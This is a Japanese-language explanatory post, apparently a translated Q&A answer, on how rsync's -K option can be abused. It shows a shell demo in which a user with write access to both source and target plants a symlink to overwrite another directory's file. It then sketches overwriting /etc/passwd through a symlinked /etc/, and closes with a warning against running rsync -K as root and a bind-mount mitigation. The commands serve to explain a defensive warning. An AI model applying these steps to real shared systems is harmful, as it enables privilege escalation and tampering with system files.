`rsync -K`ベースのエクスプロイト

-Kオプションの使用は正しいです。しかし、この悪用は、リンクの作成を実行し、rsyncを実行するさまざまなユーザーを対象としています。まず、いくつかのrsync -Kの動作を見てみましょう。テストディレクトリをいくつか作成します。

[me] $ mkdir a b c b/from b/from/mydir c/to
[me] $ touch a/bar
[me] $ touch b/from/mydir/foo

そして、単純なrsyncを実行します

[me] $ rsync -avK b/from/ c/to
sending incremental file list
./
mydir/
mydir/foo

sent 135 bytes  received 39 bytes  348.00 bytes/sec
total size is 0  speedup is 0.00
[me] $ find c/to/
c/to/
c/to/mydir
c/to/mydir/foo

そして、新しいテストの前にcをクリーンアップしましょう：

[me] $ rm -rf c/to
[me] $ mkdir c/to

ここで、私が一部のother userにc/toおよびb/fromへの書き込み権限を与えることを想像してください。物事を簡単にするために、次のchgrpを使用すると、多くの人がそこに書き込むことができます。

[me] $ chgrp -R students c/to b/from

そして賢い学生がこれを実行します：

[student] $ ln -s ../../a c/to/student_dir
[student] $ mkdir b/from/student_dir
[student] $ echo 1337 > b/from/student_dir/bar

翌朝、rsyncを実行します。

[me] $ rsync -avK b/from/ c/to/
sending incremental file list
./
student_dir/
student_dir/bar

痛い！変更する権限を誰にも与えなかったa内のファイルが変更されました。

[me] $ cat a/bar
1337

また、rsyncは一般的にcronジョブなどの反復的なタスクに使用されるため、これが気付かれない可能性もあります。

簡単に言うと、エクスプロイトは次のように主張できます：再帰的なrsyncジョブの送信側（from）と受信側（to）にアクセスできるユーザーは、rsyncを実行しているユーザーの特権を取得しますジョブ。

Rootとしてrsync -Kを実行しないでください！

攻撃の可能性があります。送信者のこれから始めます：

sender:/path/to/sourcedir
└── foo@ -> /etc/

Rsyncを1回実行して、これを取得します。

receiver:/path/to/targetdir
└── foo@ -> /etc/

これを送信者に変更してください：

sender:/path/to/sourcedir
└── foo/
    └── passwd

Rsyncが再び実行されると、/ etc/passwdがレシーバーで上書きされます。

バインドマウントは、rsyncが常にそれらを介して書き込みを行うが、それらを作成しないため、この攻撃を防止します。